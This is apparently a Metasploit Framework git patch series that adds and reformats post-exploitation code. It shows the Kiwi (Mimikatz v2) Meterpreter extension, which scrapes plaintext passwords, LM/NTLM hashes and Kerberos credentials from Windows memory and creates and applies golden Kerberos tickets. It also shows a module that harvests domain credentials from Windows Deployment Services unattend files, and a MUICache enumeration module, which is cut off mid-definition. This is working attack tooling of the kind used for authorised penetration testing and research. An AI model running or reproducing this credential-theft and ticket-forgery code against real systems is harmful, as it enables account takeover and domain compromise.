'VV'+ # Time Last Write + 'VV'+ # Time Change + 'VV'+ # End of File + 'VV'+ # Allocation Size + 'V'+ # File Attributes + 'V'+ # File Name Length + 'V'+ # Extended Attr List Length + 'C'+ # Short File Name Length + 'C' # Reserved + ) + name = resp_data[didx + 70 + 24, info[15]].sub!(/\x00+$/, '') + files[name] = + { + 'type' => (info[14] & 0x10) ? 'D' : 'F', + 'attr' => info[14], + 'info' => info + } - break if info[0] == 0 - didx += info[0] - end - last_search_id = sid - last_offset = loff - last_filename = name - if eos == 0 and last_offset != 0 #If we aren't at the end of the search, run find_next - resp = find_next(last_search_id, last_offset, last_filename) - search_next = 1 # Flip bit so response params will parse correctly - end - end until eos != 0 or last_offset == 0 - rescue ::Exception - raise $! - end + break if info[0] == 0 + didx += info[0] + end + last_search_id = sid + last_offset = loff + last_filename = name + if eos == 0 and last_offset != 0 #If we aren't at the end of the search, run find_next + resp = find_next(last_search_id, last_offset, last_filename) + search_next = 1 # Flip bit so response params will parse correctly + end + end until eos != 0 or last_offset == 0 + rescue ::Exception + raise $! + end - return files - end + return files + end - # Supplements find_first if file/dir count exceeds max search count - def find_next(sid, resume_key, last_filename) + # Supplements find_first if file/dir count exceeds max search count + def find_next(sid, resume_key, last_filename) - parm = [ - sid, # Search ID - 20, # Maximum search count (Size of 20 keeps response to 1 packet) - 260, # Level of interest - resume_key, # Resume key from previous (Last name offset) - 6, # Close search if end of search - ].pack('vvvVv') + last_filename + "\x00" # Last filename returned from find_first or find_next - resp = trans2(CONST::TRANS2_FIND_NEXT2, parm, '') - return resp # Returns the FIND_NEXT2 response packet for parsing by the find_first function - end + parm = [ + sid, # Search ID + 20, # Maximum search count (Size of 20 keeps response to 1 packet) + 260, # Level of interest + resume_key, # Resume key from previous (Last name offset) + 6, # Close search if end of search + ].pack('vvvVv') + last_filename + "\x00" # Last filename returned from find_first or find_next + resp = trans2(CONST::TRANS2_FIND_NEXT2, parm, '') + return resp # Returns the FIND_NEXT2 response packet for parsing by the find_first function + end - # Recursively search through directories, to a max depth, searching for filenames - # that matches regex and returns path to matching files. - def file_search(current_path, regex, depth) - depth -= 1 - if depth < 0 - return - end + # Recursively search through directories, to a max depth, searching for filenames + # that matches regex and returns path to matching files. + def file_search(current_path, regex, depth) + depth -= 1 + if depth < 0 + return + end - results = find_first("#{current_path}*") - files = [] + results = find_first("#{current_path}*") + files = [] - results.each do |result| - if result[0] =~ /^(\.){1,2}$/ # Ignore . .. - next - end + results.each do |result| + if result[0] =~ /^(\.){1,2}$/ # Ignore . .. + next + end - if result[1]['attr'] & CONST::SMB_EXT_FILE_ATTR_DIRECTORY > 0 - search_path = "#{current_path}#{result[0]}\\" - begin - files << file_search(search_path, regex, depth).flatten.compact - rescue Rex::Proto::SMB::Exceptions::ErrorCode => e - # Ignore permission errors - unless e.get_error(e.error_code) == 'STATUS_ACCESS_DENIED' - raise e - end - end - else - if result[0] =~ regex - files << "#{current_path}#{result[0]}" - end - end - end + if result[1]['attr'] & CONST::SMB_EXT_FILE_ATTR_DIRECTORY > 0 + search_path = "#{current_path}#{result[0]}\\" + begin + files << file_search(search_path, regex, depth).flatten.compact + rescue Rex::Proto::SMB::Exceptions::ErrorCode => e + # Ignore permission errors + unless e.get_error(e.error_code) == 'STATUS_ACCESS_DENIED' + raise e + end + end + else + if result[0] =~ regex + files << "#{current_path}#{result[0]}" + end + end + end - return files.flatten.compact - end + return files.flatten.compact + end - # Creates a new directory on the mounted tree - def create_directory(name) - files = { } - parm = [0].pack('V') + name + "\x00" - resp = trans2(CONST::TRANS2_CREATE_DIRECTORY, parm, '') - end + # Creates a new directory on the mounted tree + def create_directory(name) + files = { } + parm = [0].pack('V') + name + "\x00" + resp = trans2(CONST::TRANS2_CREATE_DIRECTORY, parm, '') + end # public read/write methods attr_accessor :native_os, :native_lm, :encrypt_passwords, :extended_security, :read_timeout, :evasion_opts diff --git a/modules/auxiliary/gather/windows_deployment_services_shares.rb b/modules/auxiliary/gather/windows_deployment_services_shares.rb index b4a5c4f48d..73647aa0e5 100644 --- a/modules/auxiliary/gather/windows_deployment_services_shares.rb +++ b/modules/auxiliary/gather/windows_deployment_services_shares.rb @@ -11,226 +11,226 @@ require 'rex/parser/unattend' class Metasploit3 < Msf::Auxiliary - include Msf::Exploit::Remote::SMB - include Msf::Exploit::Remote::SMB::Authenticated - include Msf::Exploit::Remote::DCERPC + include Msf::Exploit::Remote::SMB + include Msf::Exploit::Remote::SMB::Authenticated + include Msf::Exploit::Remote::DCERPC - include Msf::Auxiliary::Report - include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Microsoft Windows Deployment Services Unattend Gatherer', - 'Description' => %q{ - Used after discovering domain credentials with aux/scanner/dcerpc/windows_deployment_services - or if you already have domain credentials. Will attempt to connect to the RemInst share and any - Microsoft Deployment Toolkit shares (identified by comments), search for unattend files, and recover credentials. - }, - 'Author' => [ 'Ben Campbell ' ], - 'License' => MSF_LICENSE, - 'References' => - [ - [ 'MSDN', 'http://technet.microsoft.com/en-us/library/cc749415(v=ws.10).aspx'], - [ 'URL', 'http://rewtdance.blogspot.co.uk/2012/11/windows-deployment-services-clear-text.html'], - ], - )) + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Microsoft Windows Deployment Services Unattend Gatherer', + 'Description' => %q{ + Used after discovering domain credentials with aux/scanner/dcerpc/windows_deployment_services + or if you already have domain credentials. Will attempt to connect to the RemInst share and any + Microsoft Deployment Toolkit shares (identified by comments), search for unattend files, and recover credentials. + }, + 'Author' => [ 'Ben Campbell ' ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'MSDN', 'http://technet.microsoft.com/en-us/library/cc749415(v=ws.10).aspx'], + [ 'URL', 'http://rewtdance.blogspot.co.uk/2012/11/windows-deployment-services-clear-text.html'], + ], + )) - register_options( - [ - Opt::RPORT(445), - OptString.new('SMBDomain', [ false, "SMB Domain", '']), - ], self.class) + register_options( + [ + Opt::RPORT(445), + OptString.new('SMBDomain', [ false, "SMB Domain", '']), + ], self.class) - deregister_options('RHOST', 'CHOST', 'CPORT', 'SSL', 'SSLVersion') - end + deregister_options('RHOST', 'CHOST', 'CPORT', 'SSL', 'SSLVersion') + end - def share_type(val) - stypes = [ - 'DISK', - 'PRINTER', - 'DEVICE', - 'IPC', - 'SPECIAL', - 'TEMPORARY' - ] + def share_type(val) + stypes = [ + 'DISK', + 'PRINTER', + 'DEVICE', + 'IPC', + 'SPECIAL', + 'TEMPORARY' + ] - if val > (stypes.length - 1) - return 'UNKNOWN' - end + if val > (stypes.length - 1) + return 'UNKNOWN' + end - stypes[val] - end + stypes[val] + end - # Stolen from enumshares - Tried refactoring into simple client, but the two methods need to go in EXPLOIT::SMB and EXPLOIT::DCERPC - # and then the lanman method calls the RPC method. Suggestions where to refactor to welcomed! - def srvsvc_netshareenum - simple.connect("IPC$") - handle = dcerpc_handle('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0', 'ncacn_np', ["\\srvsvc"]) - begin - dcerpc_bind(handle) - rescue Rex::Proto::SMB::Exceptions::ErrorCode => e - print_error("#{rhost} : #{e.message}") - return - end + # Stolen from enumshares - Tried refactoring into simple client, but the two methods need to go in EXPLOIT::SMB and EXPLOIT::DCERPC + # and then the lanman method calls the RPC method. Suggestions where to refactor to welcomed! + def srvsvc_netshareenum + simple.connect("IPC$") + handle = dcerpc_handle('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0', 'ncacn_np', ["\\srvsvc"]) + begin + dcerpc_bind(handle) + rescue Rex::Proto::SMB::Exceptions::ErrorCode => e + print_error("#{rhost} : #{e.message}") + return + end - stubdata = - NDR.uwstring("\\\\#{rhost}") + - NDR.long(1) #level + stubdata = + NDR.uwstring("\\\\#{rhost}") + + NDR.long(1) #level - ref_id = stubdata[0,4].unpack("V")[0] - ctr = [1, ref_id + 4 , 0, 0].pack("VVVV") + ref_id = stubdata[0,4].unpack("V")[0] + ctr = [1, ref_id + 4 , 0, 0].pack("VVVV") - stubdata << ctr - stubdata << NDR.align(ctr) - stubdata << ["FFFFFFFF"].pack("H*") - stubdata << [ref_id + 8, 0].pack("VV") - response = dcerpc.call(0x0f, stubdata) - res = response.dup - win_error = res.slice!(-4, 4).unpack("V")[0] - if win_error != 0 - raise "DCE/RPC error : Win_error = #{win_error + 0}" - end - #remove some uneeded data - res.slice!(0,12) # level, CTR header, Reference ID of CTR - share_count = res.slice!(0, 4).unpack("V")[0] - res.slice!(0,4) # Reference ID of CTR1 - share_max_count = res.slice!(0, 4).unpack("V")[0] + stubdata << ctr + stubdata << NDR.align(ctr) + stubdata << ["FFFFFFFF"].pack("H*") + stubdata << [ref_id + 8, 0].pack("VV") + response = dcerpc.call(0x0f, stubdata) + res = response.dup + win_error = res.slice!(-4, 4).unpack("V")[0] + if win_error != 0 + raise "DCE/RPC error : Win_error = #{win_error + 0}" + end + #remove some uneeded data + res.slice!(0,12) # level, CTR header, Reference ID of CTR + share_count = res.slice!(0, 4).unpack("V")[0] + res.slice!(0,4) # Reference ID of CTR1 + share_max_count = res.slice!(0, 4).unpack("V")[0] - raise "Dce/RPC error : Unknow situation encountered count != count max (#{share_count}/#{share_max_count})" if share_max_count != share_count + raise "Dce/RPC error : Unknow situation encountered count != count max (#{share_count}/#{share_max_count})" if share_max_count != share_count - types = res.slice!(0, share_count * 12).scan(/.{12}/n).map{|a| a[4,2].unpack("v")[0]} # RerenceID / Type / ReferenceID of Comment + types = res.slice!(0, share_count * 12).scan(/.{12}/n).map{|a| a[4,2].unpack("v")[0]} # RerenceID / Type / ReferenceID of Comment - share_count.times do |t| - length, offset, max_length = res.slice!(0, 12).unpack("VVV") - raise "Dce/RPC error : Unknow situation encountered offset != 0 (#{offset})" if offset != 0 - raise "Dce/RPC error : Unknow situation encountered length !=max_length (#{length}/#{max_length})" if length != max_length - name = res.slice!(0, 2 * length).gsub('\x00','') - res.slice!(0,2) if length % 2 == 1 # pad + share_count.times do |t| + length, offset, max_length = res.slice!(0, 12).unpack("VVV") + raise "Dce/RPC error : Unknow situation encountered offset != 0 (#{offset})" if offset != 0 + raise "Dce/RPC error : Unknow situation encountered length !=max_length (#{length}/#{max_length})" if length != max_length + name = res.slice!(0, 2 * length).gsub('\x00','') + res.slice!(0,2) if length % 2 == 1 # pad - comment_length, comment_offset, comment_max_length = res.slice!(0, 12).unpack("VVV") - raise "Dce/RPC error : Unknow situation encountered comment_offset != 0 (#{comment_offset})" if comment_offset != 0 - if comment_length != comment_max_length - raise "Dce/RPC error : Unknow situation encountered comment_length != comment_max_length (#{comment_length}/#{comment_max_length})" - end - comment = res.slice!(0, 2 * comment_length).gsub('\x00','') - res.slice!(0,2) if comment_length % 2 == 1 # pad + comment_length, comment_offset, comment_max_length = res.slice!(0, 12).unpack("VVV") + raise "Dce/RPC error : Unknow situation encountered comment_offset != 0 (#{comment_offset})" if comment_offset != 0 + if comment_length != comment_max_length + raise "Dce/RPC error : Unknow situation encountered comment_length != comment_max_length (#{comment_length}/#{comment_max_length})" + end + comment = res.slice!(0, 2 * comment_length).gsub('\x00','') + res.slice!(0,2) if comment_length % 2 == 1 # pad - @shares << [ name, share_type(types[t]), comment] - end - end + @shares << [ name, share_type(types[t]), comment] + end + end - def run_host(ip) + def run_host(ip) - @shares = [] - deploy_shares = [] + @shares = [] + deploy_shares = [] - begin - connect - smb_login - srvsvc_netshareenum + begin + connect + smb_login + srvsvc_netshareenum - @shares.each do |share| - # I hate unicode, couldn't find any other way to get these to compare! - # look at iconv for 1.8/1.9 compatability? - if (share[0].unpack('H*') == "REMINST\x00".encode('utf-16LE').unpack('H*')) || - (share[2].unpack('H*') == "MDT Deployment Share\x00".encode('utf-16LE').unpack('H*')) + @shares.each do |share| + # I hate unicode, couldn't find any other way to get these to compare! + # look at iconv for 1.8/1.9 compatability? + if (share[0].unpack('H*') == "REMINST\x00".encode('utf-16LE').unpack('H*')) || + (share[2].unpack('H*') == "MDT Deployment Share\x00".encode('utf-16LE').unpack('H*')) - print_status("#{ip}:#{rport} #{share[0]} - #{share[1]} - #{share[2]}") - deploy_shares << share[0] - end - end + print_status("#{ip}:#{rport} #{share[0]} - #{share[1]} - #{share[2]}") + deploy_shares << share[0] + end + end - deploy_shares.each do |deploy_share| - query_share(ip, deploy_share) - end + deploy_shares.each do |deploy_share| + query_share(ip, deploy_share) + end - rescue ::Interrupt - raise $! - end - end + rescue ::Interrupt + raise $! + end + end - def query_share(rhost, deploy_share) - share_path = "\\\\#{rhost}\\#{deploy_share}" - print_status("Enumerating #{share_path}") - table = Rex::Ui::Text::Table.new({ - 'Header' => share_path, - 'Indent' => 1, - 'Columns' => ['Path', 'Type', 'Domain', 'Username', 'Password'] - }) + def query_share(rhost, deploy_share) + share_path = "\\\\#{rhost}\\#{deploy_share}" + print_status("Enumerating #{share_path}") + table = Rex::Ui::Text::Table.new({ + 'Header' => share_path, + 'Indent' => 1, + 'Columns' => ['Path', 'Type', 'Domain', 'Username', 'Password'] + }) - creds_found = false + creds_found = false - # ruby 1.8 compat? - share = deploy_share.force_encoding('utf-16LE').encode('ASCII-8BIT').strip + # ruby 1.8 compat? + share = deploy_share.force_encoding('utf-16LE').encode('ASCII-8BIT').strip - begin - simple.connect(share) - rescue ::Exception => e - print_error("#{share_path} - #{e}") - return - end + begin + simple.connect(share) + rescue ::Exception => e + print_error("#{share_path} - #{e}") + return + end - results = simple.client.file_search("\\", /unattend.xml$/i, 10) + results = simple.client.file_search("\\", /unattend.xml$/i, 10) - results.each do |file_path| - file = simple.open(file_path, 'o').read() + results.each do |file_path| + file = simple.open(file_path, 'o').read() - unless file.nil? - loot_unattend(file) + unless file.nil? + loot_unattend(file) - creds = parse_client_unattend(file) - creds.each do |cred| - unless cred.empty? - unless cred['username'].nil? || cred['password'].nil? - print_good("Retrived #{cred['type']} credentials from #{file_path}") - creds_found = true - domain = "" - domain = cred['domain'] if cred['domain'] - report_creds(domain, cred['username'], cred['password']) - table << [file_path, cred['type'], domain, cred['username'], cred['password']] - end - end - end - end - end + creds = parse_client_unattend(file) + creds.each do |cred| + unless cred.empty? + unless cred['username'].nil? || cred['password'].nil? + print_good("Retrived #{cred['type']} credentials from #{file_path}") + creds_found = true + domain = "" + domain = cred['domain'] if cred['domain'] + report_creds(domain, cred['username'], cred['password']) + table << [file_path, cred['type'], domain, cred['username'], cred['password']] + end + end + end + end + end - if creds_found - print_line - table.print - print_line - else - print_error("No Unattend files found.") - end - end + if creds_found + print_line + table.print + print_line + else + print_error("No Unattend files found.") + end + end - def parse_client_unattend(data) - begin - xml = REXML::Document.new(data) + def parse_client_unattend(data) + begin + xml = REXML::Document.new(data) - rescue REXML::ParseException => e - print_error("Invalid XML format") - vprint_line(e.message) - end + rescue REXML::ParseException => e + print_error("Invalid XML format") + vprint_line(e.message) + end - return Rex::Parser::Unattend.parse(xml).flatten - end + return Rex::Parser::Unattend.parse(xml).flatten + end - def loot_unattend(data) - return if data.empty? - p = store_loot('windows.unattend.raw', 'text/plain', rhost, data, "Windows Deployment Services") - print_status("Raw version saved as: #{p}") - end + def loot_unattend(data) + return if data.empty? + p = store_loot('windows.unattend.raw', 'text/plain', rhost, data, "Windows Deployment Services") + print_status("Raw version saved as: #{p}") + end - def report_creds(domain, user, pass) - report_auth_info( - :host => rhost, - :port => 445, - :sname => 'smb', - :proto => 'tcp', - :source_id => nil, - :source_type => "aux", - :user => "#{domain}\\#{user}", - :pass => pass) - end + def report_creds(domain, user, pass) + report_auth_info( + :host => rhost, + :port => 445, + :sname => 'smb', + :proto => 'tcp', + :source_id => nil, + :source_type => "aux", + :user => "#{domain}\\#{user}", + :pass => pass) + end end From 0f722cbe6db49738698ebe87637c595ca84884df Mon Sep 17 00:00:00 2001 From: OJ Date: Fri, 10 Jan 2014 16:51:01 +1000 Subject: [PATCH 008/853] Add ext_server_kiwi, which is Mimikatz v2 This is a separate extension because the new version doesn't support as many operating systems as the old version, but it does have more new features which are really funky. --- .../post/meterpreter/extensions/kiwi/kiwi.rb | 116 +++++++++++ .../post/meterpreter/extensions/kiwi/tlv.rb | 28 +++ .../ui/console/command_dispatcher/kiwi.rb | 186 ++++++++++++++++++ 3 files changed, 330 insertions(+) create mode 100644 lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb create mode 100644 lib/rex/post/meterpreter/extensions/kiwi/tlv.rb create mode 100644 lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb diff --git a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb new file mode 100644 index 0000000000..344ee25912 --- /dev/null +++ b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb @@ -0,0 +1,116 @@ +# -*- coding: binary -*- + +require 'rex/post/meterpreter/extensions/kiwi/tlv' +require 'csv' + +module Rex +module Post +module Meterpreter +module Extensions +module Kiwi + +### +# +# Kiwi extension - grabs credentials from windows memory. +# +# Benjamin DELPY `gentilkiwi` +# http://blog.gentilkiwi.com/mimikatz +# +# extension converted by OJ Reeves (TheColonial) +### + +class Kiwi < Extension + + PWD_ID_SEK_ALLPASS = 0 + PWD_ID_SEK_WDIGEST = 1 + PWD_ID_SEK_MSV = 2 + PWD_ID_SEK_KERBEROS = 3 + PWD_ID_SEK_TSPKG = 4 + PWD_ID_SEK_LIVESSP = 5 + PWD_ID_SEK_SSP = 6 + PWD_ID_SEK_TICKETS = 7 + PWD_ID_SEK_DPAPI = 8 + + def initialize(client) + super(client, 'kiwi') + + client.register_extension_aliases( + [ + { + 'name' => 'kiwi', + 'ext' => self + }, + ]) + end + + def golden_ticket_use(ticket) + request = Packet.create_request('kiwi_golden_ticket_use') + request.add_tlv(TLV_TYPE_KIWI_GOLD_TICKET, ticket, false, true) + + client.send_request(request) + end + + def golden_ticket_create(user, domain, sid, tgt) + request = Packet.create_request('kiwi_golden_ticket_create') + request.add_tlv(TLV_TYPE_KIWI_GOLD_USER, user) + request.add_tlv(TLV_TYPE_KIWI_GOLD_DOMAIN, domain) + request.add_tlv(TLV_TYPE_KIWI_GOLD_SID, sid) + request.add_tlv(TLV_TYPE_KIWI_GOLD_TGT, tgt) + + response = client.send_request(request) + + return response.get_tlv_value(TLV_TYPE_KIWI_GOLD_TICKET) + end + + def scrape_passwords(pwd_id) + request = Packet.create_request('kiwi_scrape_passwords') + request.add_tlv(TLV_TYPE_KIWI_PWD_ID, pwd_id) + response = client.send_request(request) + + results = [] + response.each(TLV_TYPE_KIWI_PWD_RESULT) do |r| + results << { + :username => r.get_tlv_value(TLV_TYPE_KIWI_PWD_USERNAME), + :domain => r.get_tlv_value(TLV_TYPE_KIWI_PWD_DOMAIN), + :password => r.get_tlv_value(TLV_TYPE_KIWI_PWD_PASSWORD), + :auth_hi => r.get_tlv_value(TLV_TYPE_KIWI_PWD_AUTH_HI), + :auth_lo => r.get_tlv_value(TLV_TYPE_KIWI_PWD_AUTH_LO), + :lm => r.get_tlv_value(TLV_TYPE_KIWI_PWD_LMHASH), + :ntlm => r.get_tlv_value(TLV_TYPE_KIWI_PWD_NTLMHASH) + } + end + + return results + end + + def all_pass + return scrape_passwords(PWD_ID_SEK_ALLPASS) + end + + def wdigest + return scrape_passwords(PWD_ID_SEK_WDIGEST) + end + + def msv + return scrape_passwords(PWD_ID_SEK_MSV) + end + + def livessp + return scrape_passwords(PWD_ID_SEK_LIVESSP) + end + + def ssp + return scrape_passwords(PWD_ID_SEK_SSP) + end + + def tspkg + return scrape_passwords(PWD_ID_SEK_TSPKG) + end + + def kerberos + return scrape_passwords(PWD_ID_SEK_KERBEROS) + end +end + +end; end; end; end; end + diff --git a/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb b/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb new file mode 100644 index 0000000000..46efabf911 --- /dev/null +++ b/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb @@ -0,0 +1,28 @@ +# -*- coding: binary -*- +module Rex +module Post +module Meterpreter +module Extensions +module Kiwi + +TLV_TYPE_KIWI_PWD_ID = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 1) +TLV_TYPE_KIWI_PWD_RESULT = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 2) +TLV_TYPE_KIWI_PWD_USERNAME = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 3) +TLV_TYPE_KIWI_PWD_DOMAIN = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 4) +TLV_TYPE_KIWI_PWD_PASSWORD = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 5) +TLV_TYPE_KIWI_PWD_AUTH_HI = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 6) +TLV_TYPE_KIWI_PWD_AUTH_LO = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 7) +TLV_TYPE_KIWI_PWD_LMHASH = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 8) +TLV_TYPE_KIWI_PWD_NTLMHASH = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9) + +TLV_TYPE_KIWI_GOLD_USER = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 10) +TLV_TYPE_KIWI_GOLD_DOMAIN = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 11) +TLV_TYPE_KIWI_GOLD_SID = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 12) +TLV_TYPE_KIWI_GOLD_TGT = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 13) +TLV_TYPE_KIWI_GOLD_TICKET = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 14) + +end +end +end +end +end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb new file mode 100644 index 0000000000..39f6be508f --- /dev/null +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb @@ -0,0 +1,186 @@ +# -*- coding: binary -*- +require 'rex/post/meterpreter' + +module Rex +module Post +module Meterpreter +module Ui + +### +# +# Kiwi extension - grabs credentials from windows memory. +# +# Benjamin DELPY `gentilkiwi` +# http://blog.gentilkiwi.com/mimikatz +# +# extension converted by OJ Reeves (TheColonial) +### +class Console::CommandDispatcher::Kiwi + + Klass = Console::CommandDispatcher::Kiwi + + include Console::CommandDispatcher + + # + # Initializes an instance of the priv command interaction. + # + def initialize(shell) + super + if (client.platform =~ /x86/) and (client.sys.config.sysinfo['Architecture'] =~ /x64/) + print_line + print_warning "Loaded x86 Kiwi on an x64 architecture." + end + end + + # + # List of supported commands. + # + def commands + { + "creds_wdigest" => "Attempt to retrieve WDigest creds", + "creds_msv" => "Attempt to retrieve LM/NTLM creds (hashes)", + "creds_livessp" => "Attempt to retrieve LiveSSP creds", + "creds_ssp" => "Attempt to retrieve SSP creds", + "creds_tspkg" => "Attempt to retrieve TsPkg creds", + "creds_kerberos" => "Attempt to retrieve Kerberos creds", + "creds_all" => "Attempt to retrieve all credentials", + "golden_ticket_create" => "Attempt to create a golden kerberos ticket", + "golden_ticket_use" => "Attempt to use a golden kerberos ticket" + } + end + + def scrape_passwords(provider, method) + get_privs + print_status("Retrieving #{provider} credentials") + accounts = method.call + + table = Rex::Ui::Text::Table.new( + 'Header' => "#{provider} credentials", + 'Indent' => 0, + 'SortIndex' => 4, + 'Columns' => + [ + 'Domain', 'User', 'Password', 'Auth Id', 'LM Hash', 'NTLM Hash' + ] + ) + + accounts.each do |acc| + table << [ + acc[:domain], + acc[:username], + acc[:password], + "#{acc[:auth_hi]} ; #{acc[:auth_lo]}", + acc[:lm], + acc[:ntlm] + ] + end + + print_line table.to_s + return true + end + + def cmd_golden_ticket_create(*args) + if args.length != 5 + print_line("Usage: golden_ticket_create user domain sid tgt ticketpath") + return + end + + user = args[0] + domain = args[1] + sid = args[2] + tgt = args[3] + target = args[4] + ticket = client.kiwi.golden_ticket_create(user, domain, sid, tgt) + ::File.open( target, 'wb' ) do |f| + f.write ticket + end + print_good("Golden ticket written to #{target}") + end + + def cmd_golden_ticket_use(*args) + if args.length != 1 + print_line("Usage: golden_ticket_use ticketpath") + return + end + + target = args[0] + ticket = '' + ::File.open(target, 'rb') do |f| + ticket += f.read(f.stat.size) + end + print_status("Using ticket stored in #{target}, #{ticket.length} bytes") + client.kiwi.golden_ticket_use(ticket) + print_good("Ticket applied successfully") + end + + def cmd_creds_all(*args) + method = Proc.new { client.kiwi.all_pass } + scrape_passwords("all", method) + end + + def cmd_creds_wdigest(*args) + method = Proc.new { client.kiwi.wdigest } + scrape_passwords("wdigest", method) + end + + def cmd_creds_msv(*args) + method = Proc.new { client.kiwi.msv } + scrape_passwords("msv", method) + end + + def cmd_creds_livessp(*args) + method = Proc.new { client.kiwi.livessp } + scrape_passwords("livessp", method) + end + + def cmd_creds_ssp(*args) + method = Proc.new { client.kiwi.ssp } + scrape_passwords("ssp", method) + end + + def cmd_creds_tspkg(*args) + method = Proc.new { client.kiwi.tspkg } + scrape_passwords("tspkg", method) + end + + def cmd_creds_kerberos(*args) + method = Proc.new { client.kiwi.kerberos } + scrape_passwords("kerberos", method) + end + + def get_privs + unless system_check + print_status("Attempting to getprivs") + privs = client.sys.config.getprivs + unless privs.include? "SeDebugPrivilege" + print_warning("Did not get SeDebugPrivilege") + else + print_good("Got SeDebugPrivilege") + end + else + print_good("Running as SYSTEM") + end + end + + def system_check + unless (client.sys.config.getuid == "NT AUTHORITY\\SYSTEM") + print_warning("Not currently running as SYSTEM") + return false + end + + return true + end + + # + # Name for this dispatcher + # + def name + "Kiwi" + end +end + +end +end +end +end + From 9a81420e9065267eb40f9747fa9debf52b749be0 Mon Sep 17 00:00:00 2001 From: jiuweigui Date: Fri, 10 Jan 2014 13:21:47 +0200 Subject: [PATCH 009/853] Enumerate WinXP/7 MUICache registry key --- modules/post/windows/gather/enum_muicache.rb | 278 +++++++++++++++++++ 1 file changed, 278 insertions(+) create mode 100644 modules/post/windows/gather/enum_muicache.rb diff --git a/modules/post/windows/gather/enum_muicache.rb b/modules/post/windows/gather/enum_muicache.rb new file mode 100644 index 0000000000..273305939d --- /dev/null +++ b/modules/post/windows/gather/enum_muicache.rb @@ -0,0 +1,278 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'rex' +require 'msf/core' +require 'rex/registry' + +class Metasploit3 < Msf::Post + include Msf::Post::File + include Msf::Post::Windows::Priv + include Msf::Post::Windows::Registry + + def initialize(info={}) + super(update_info(info, + 'Name' =>'Windows Gather Enum User MUICache', + 'Description' => + %q{ + This module gathers information about the files and file paths that + logged on users have executed on the system and it will also check + if the file still exists on the system in the file path it has been + previously executed. This information is gathered by using information + stored under the MUICache registry key. If the user is logged in when the + module is executed it will collect the MUICache entries by accessing + the registry directly. If the user is not logged in the module will + download users registry hive NTUSER.DAT/UsrClass.dat from the system + and the MUICache contents are parsed from the downloaded hive. + }, + 'License' => MSF_LICENSE, + 'Author' => ['TJ Glad '], + 'Platform' => ['win'], + 'SessionType' => ['meterpreter'] + )) + end + + def find_usernames() + # This function scrapes usernames, sids and homepaths from the + # registry so that we'll know what user accounts are on the system + # and where we can find those users registry hives. + usernames = Array.new + user_homedir_paths = Array.new + user_sids = Array.new + + username_reg_path = "HKLM\\Software\\Microsoft\\Windows\ NT\\CurrentVersion\\ProfileList" + profile_subkeys = registry_enumkeys(username_reg_path) + if profile_subkeys.blank? + print_error("Unable to access ProfileList registry key. Can't continue.") + return nil + else + profile_subkeys.each do |user_sid| + if user_sid.length > 10 + user_home_path = registry_getvaldata("HKLM\\Software\\Microsoft\\Windows\ NT\\CurrentVersion\\ProfileList\\#{user_sid}", "ProfileImagePath") + unless user_home_path.blank? + full_path = user_home_path.delete("\00") + usernames << full_path.split("\\").last + user_homedir_paths << full_path + user_sids << user_sid + else + print_error("Unable to read ProfileImagePath from the registry. Can't continue.") + return nil + end + end + end + end + return usernames, user_homedir_paths, user_sids + end + + def enum_muicache_paths(sys_sids, mui_path) + # This function builds full registry muicache paths so that we can + # later enumerate the muicahe registry key contents. + user_mui_paths = Array.new + hive = "HKU\\" + sys_sids.each do |sid| + full_path = hive + sid + mui_path + user_mui_paths << full_path + end + return user_mui_paths + end + + def enumerate_muicache(muicache_reg_keys, sys_users, sys_paths, muicache, hive_file, table) + # This is the main enumeration function that calls other main + # functions depending if we can access the registry directly or if + # we need to download the hive and process it locally. + loot_path = Msf::Config::loot_directory + all_user_entries = sys_users.zip(muicache_reg_keys, sys_paths) + all_user_entries.each do |user, reg_key, sys_path| + local_hive_copy = ::File.join(loot_path, "#{sysinfo['Computer']}_#{user}_HIVE_#{::Time.now.utc.strftime('%Y%m%d.%M%S')}") + subkeys = registry_enumvals(reg_key) + unless subkeys.blank? + # If the registry_enumvals returns us content we'll know that we + # can access the registry directly and thus continue to process + # the content collected from there. + print_status("User #{user}: Enumerating registry..") + subkeys.each do |key| + if key[0] != "@" and key != "LangID" and not key.nil? + check_file_exists(key, user, table) + end + end + else + # If the registry_enumvals returns us nothing then we'll know + # that the user is most likely not logged in and we'll need to + # download and process users hive locally. + print_error("User #{user}: Can't access registry (maybe the user is not logged in atm?). Trying NTUSER.DAT/USRCLASS.DAT..") + process_hive(sys_path, user, local_hive_copy, table, muicache, hive_file) + end + end + return table + end + + def check_file_exists(key, user, table) + # This function will check if it can find the program executable + # from the path it found from the registry. Permissions might affect + # if it detects the executable but it should be otherwise fairly + # reliable. + program_path = expand_path(key) + program_exists = file_exist?(key) + if program_exists == true + exists = "File found" + else + exists = "File not found" + end + table << [user, program_path, exists] + end + + def 